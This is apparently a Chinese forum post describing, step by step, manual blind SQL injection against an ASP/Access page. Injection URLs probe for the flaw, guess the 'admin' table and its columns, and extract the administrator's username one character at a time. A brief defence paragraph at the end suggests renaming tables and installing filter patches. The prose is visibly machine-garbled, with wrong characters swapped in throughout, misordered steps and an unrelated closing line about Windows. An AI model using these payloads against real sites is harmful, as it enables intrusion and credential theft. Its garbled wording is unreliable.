|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
asp可以使用微软的activeX使得网页功能无比强大,不过安全性也较差,而且是基于的windows服务器,所以性能稳定性也一般access 良多情形下,进侵者在利用工具注进时发明工具才解不出来表名和字段名,那是由于一切的工具都有本人的一部字典,这部字典内包含了表名和字段名,假如办理员把表名和字段名改成了不在这部字典内,那末我们利用的工具将没法猜解出字段名和表名。在以下的文章中,将从剖析手工注进动身,来打造抵抗SQL注进的防地。
进侵者将会机关复杂的判别前提,来判别该页面是不是存在注进毛病,一样平常步骤以下:
这里要检测的页面为http://127.0.0.1/111/view.asp?id=198
1.进侵者要想对站点举行手工注进就必需对扫瞄器举行设置,以包管手工注进时能前往堕落信息,其操纵步骤以下:
右键点击扫瞄器选择“属性”,在弹出来的对话框当选择“初级”选项卡。以下图所示:
接着往失落“显现友爱的HTTP毛病信息”后面的钩,最初点击“使用”按钮便可。
2.进侵者向扫瞄器提交以下url:
http://127.0.0.1/111/view.asp?id=198and1=1
假如存在SQL注进毛病,就能够查询数据库,1=1是一个恒等式能够疏忽,因而会前往一个一般的页面,此页面和http://127.0.0.1/111/view.asp?id=198一样,这时候进侵者便判别此站有但愿被注进。假如前往的是一些毛病信息,那末一些低级的进侵者大概就会保持这个站点。
3.进侵者进一步向扫瞄器提交以下url:
http://127.0.0.1/111/view.asp?id=198and1=2
1=2为一个恒不等式,假如该站点撑持数据库查询,则也许会前往以下图所示的信息:
一样平常呈现上图所示进侵者就基础断定此站可以举行SQL注进打击了。
不外良多时分进侵者只需用一个单引号便可疾速判别出方针站点是不是存在SQL注进毛病,向扫瞄器提交以下url:
http://127.0.0.1/111/view.asp?id=198’假如前往以下信息则申明有一半时机以上存在注进毛病:
MicrosoftOLEDBProviderforODBCDrivers毛病’80040e14’
[Microsoft][ODBCMicrosoftAccessDriver]字符串的语法毛病在查询表达式’id=1’’中。/list.asp,行50
4.此时进侵者入手下手机关特别的SQL查询语句入手下手查询站点数据库的表名,向url提交以下语句:
http://127.0.0.1/111/view.asp?id=198andexists(select*fromadmin)
这个语句是向数据库查询是不是存在admin这个表,假如存在则前往一般页面,假如不存在此表则前往堕落页面。一样平常进侵者会先测试经常使用的表名,也是一样平常的注进工具暗码字典内存在的表名和字段名。假如表名不在经常使用表名中则进侵者就会分离社会工程学来猜解表名,这类情形下进侵者料中表名的概率较低。
5.进侵者在失掉表名后入手下手机关查询语句查询数据库字段名,向url提交以下语句:
http://127.0.0.1/111/view.asp?id=198andexists(selectuserfromadmin)
这个语句是向数据库中admin表中查询是不是存在user字段,假如存在则前往一般页面,假如不存在则前往堕落页面。
7.接上去进侵者入手下手断定字段id的值,机关以下语句能够查询id的值:http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwhereid=1)
准确则前往准确页面,毛病则前往堕落页面。
6.表名和字段名推测出来今后,进侵者入手下手机关查询语句推测办理员帐号长度,向url提交以下语句:
http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwherelen(user)<6andid=1)
此语句为查询user字段顶用户名长度局限,暗示长度小于6,准确则前往一般页面,毛病则前往堕落页面。
减少局限,然后机关以下语句断定用户名详细长度:
http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwherelen(user)=5andid=1)
准确则前往一般页面,毛病则前往堕落页面。
8.接上去进侵者入手下手进进最初的环节机关语句查询办理员用户名,向url提交以下语句:http://127.0.0.1/111/view.asp?id=198andexists(selectcount(*)fromadminwhereleft(user,1)=a)
此语句是从用户名右边入手下手推测用户名地一名为a,准确则前往一般页面,毛病则前往堕落页面,一名一名猜,猜第2位时,修正语句为(user,2)=ad,前面类推。
在进侵者失掉用户名暗码今后,此次注进就靠近序幕了。
至于提防办法很复杂,从下面的历程能够看出假如表名和字段名不在经常使用表名和字段名中则进侵者是利用社会工程学来猜解,假如办理员修正的表名和字段名充足庞大则进侵者仍然不克不及到达目标,另有一种复杂的进攻办法就是到网上往下载一些防注进补钉程序打上就能够了,这类办法是修正站点文件,增添过滤语句来过滤进侵者提交的语句来到达防注进的,这里就不再给人人解说其道理了。
Windows本身的所有问题都会一成不变的也累加到了它的身上。安全性、稳定性、跨平台性都会因为与NT的捆绑而显现出来; |
|